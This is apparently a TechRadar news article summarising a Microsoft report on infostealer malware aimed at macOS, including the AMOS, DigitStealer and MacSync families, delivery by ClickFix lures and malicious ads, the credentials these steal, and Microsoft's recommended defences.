Microsoft warns infostealer malware is 'rapidly expanding beyond traditional Windows-focused campaigns' and targeting Mac devices

News
By published

Microsoft shares recommendations and mitigations for macOS users

An image of macOS’s app switcher.
(Image credit: Image credit: MacFormat)
  • Microsoft warns macOS now faces a rapidly expanding malware and infostealer ecosystem
  • Threat actors use social engineering and malicious ads to deliver DMG installers with variants like DigitStealer, MacSync, and AMOS
  • Attackers target browser sessions, cloud tokens, and developer credentials, while abusing legitimate tools like WhatsApp and Google Ads for propagation

Gone are the days when Windows was always the number one target for cybercriminals - as new research has found macOS is equally as important, with users facing a “rapidly expanding” ecosystem of malware, social engineering tactics, and legitimate but weaponized tools.

A Microsoft report found hackers are using social engineering techniques such as ClickFix (faking a problem and offering a “solution”), and malicious advertising campaigns, to deliver disk image (DMG) installers.

These installers then drop all sorts of nasties, but a few malware variants stand out - DigitStealer, MacSync, and Atomic macOS Stealer (AMOS). Microsoft also said that cross-platform malware, like the ones written in Python, is accelerating infostealer activity since it allows threat actors to quickly adapt across mixed environments.

Long-running aggregation effort

Most of the time, the crooks are interested in stealing sensitive data. However, that no longer means just passwords - it also includes browser sessions, keychains, cloud tokens, and developer credentials, since these secrets enable account takeovers, supply chain compromise, BEC and ransomware attacks and, in some cases, direct cryptocurrency theft.

Microsoft also observed the abuse of legitimate tools and services. For example, it has seen hackers compromising people’s WhatsApp accounts and then using them to propagate infostealers and other malware.

In other cases, they’ve seen malicious ad campaigns running on the Google Ads network, promoting a fake PDF editor that not only deploys an infostealer, but also establishes persistence, too.

The company has also shared a long list of recommendations and mitigations that businesses should follow, including educating employees about phishing, monitoring for suspicious Terminal activity, and inspecting network egress for POST requests to newly registered or suspicious domains.

Also, businesses should turn on cloud-delivered protection in Defender, deploy cloud-based machine learning protections, run EDR in block mode, and more.

Best antivirus software header
The best antivirus for all budgets

➡️ Read our full guide to the best antivirus
1. Best overall:
Bitdefender Total Security
2. Best for families:
Norton 360 with LifeLock
3. Best for mobile:
McAfee Mobile Security

Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!

And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.